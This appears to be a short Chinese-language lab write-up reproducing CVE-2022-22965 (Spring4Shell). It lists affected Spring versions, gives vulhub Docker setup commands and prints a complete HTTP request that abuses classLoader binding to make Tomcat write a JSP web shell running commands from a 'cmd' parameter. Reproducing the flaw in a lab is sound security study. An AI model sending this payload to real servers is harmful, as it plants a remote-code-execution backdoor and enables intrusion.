影响范围
Spring Framework 5.3.X < 5.3.18
Spring Framework 5.2.X < 5.2.20
环境搭建
目前有三种搭建方式,第一种使用官网上的老版本去直接搭建,第二种使用vulhub环境搭建,第三种使用vulfocus环境搭建。
vulhub环境
git clone https://github.com/vulhub/vulhub.git
chmod 777 vulhub
cd vulhub/spring/CVE-2022-22965
docker-compose up -d
访问
payload
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar1&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.0.101:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 0
实话是有成功几率,但是不一定能够成功,分析随后补充,不过建议使用vulfocus环境,我感觉可能是环境有点问题。另外payload的话,可以选择从github的exp和poc上选择核心内容,直接构造。
